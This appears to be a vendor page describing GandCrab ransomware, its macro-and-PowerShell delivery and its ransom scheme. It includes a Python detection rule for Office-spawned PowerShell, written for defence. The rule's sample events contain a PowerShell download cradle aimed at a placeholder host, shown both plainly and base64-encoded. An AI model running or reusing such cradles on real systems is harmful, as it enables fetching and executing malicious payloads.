GandCrab ransomware encrypts victims’ files and demands a ransom payment for data access. It follows an affiliate marketing business model, where low-level cybercriminals find new victims and the threat authors improve their creation. It is delivered through a malicious spam email containing a Microsoft Word attachment with a macro that executes a PowerShell command, which downloads the ransomware onto the victim's system.
Ransom notes are placed prominently on the victim’s computer, directing them to a website on the Dark Web where they can decrypt one file of their choosing for free. Ransom payments are made through a cryptocurrency called Dash, and the ransom demands set by the affiliate can range between $600 and $600,000.
A SIEM solution with the MITRE ATT&CK matrix can detect malicious abuse of PowerShell in your network, preventing the malware download and ensuring protection.
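The chain described above (a Word macro launching PowerShell to fetch the payload) shows up in process-creation telemetry as an Office application spawning PowerShell. The following Python rule is an added example, not code from this page or from any vendor product; the event field names, hosts, paths and URL are constructed assumptions, and the rule also decodes `-EncodedCommand` arguments before looking for download indicators.

```python
import base64
import ntpath
import re

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
DOWNLOAD_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|start-bitstransfer|net\.webclient", re.I)
# -e, -en, -enc ... -EncodedCommand followed by a base64 argument
ENC_RE = re.compile(r"-(?:e|en|enc|enco[a-z]*)\s+([A-Za-z0-9+/=]{16,})", re.I)

def expand(cmdline):
    """Append the decoded -EncodedCommand payload (UTF-16LE base64) if present."""
    m = ENC_RE.search(cmdline)
    if not m:
        return cmdline
    try:
        return cmdline + " " + base64.b64decode(m.group(1)).decode("utf-16-le", "replace")
    except ValueError:  # malformed base64: fall back to the raw command line
        return cmdline

def detect(events):
    """Flag Office applications that spawn PowerShell (ATT&CK T1059.001)."""
    alerts = []
    for ev in events:
        parent = ntpath.basename(ev["parent"]).lower()
        image = ntpath.basename(ev["image"]).lower()
        if parent in OFFICE and image in POWERSHELL:
            # Download indicators raise severity; any Office -> PowerShell spawn is still flagged.
            sev = "high" if DOWNLOAD_RE.search(expand(ev["cmdline"])) else "medium"
            alerts.append((ev["host"], sev))
    return alerts

# Constructed sample events (hosts, paths and URL are made up for this example).
WORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CRADLE = "(New-Object Net.WebClient).DownloadString('http://example.invalid/x')"
ENCODED = base64.b64encode(CRADLE.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"host": "ws-01", "parent": WORD, "image": PS, "cmdline": f"powershell -nop -w hidden -c {CRADLE}"},
    {"host": "ws-02", "parent": WORD, "image": PS, "cmdline": f"powershell -nop -enc {ENCODED}"},
    {"host": "ws-03", "parent": WORD, "image": PS, "cmdline": "powershell -c Get-Date"},
    {"host": "ws-04", "parent": r"C:\Windows\explorer.exe", "image": PS, "cmdline": f"powershell -c {CRADLE}"},
    {"host": "ws-05", "parent": WORD, "image": r"C:\Windows\splwow64.exe", "cmdline": "splwow64.exe 8192"},
]

if __name__ == "__main__":
    for host, sev in detect(SAMPLE_EVENTS):
        print(host, sev)
```

The rule keys on the parent process, so PowerShell started from `explorer.exe` (ws-04) is outside its scope and needs a separate command-line rule.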
In this video, we talk about what GandCrab is, how it spreads, and ways to mitigate this ransomware. Watch the video to learn more; three minutes is all it takes!
© 2021 Zoho Corporation Pvt. Ltd. All rights reserved.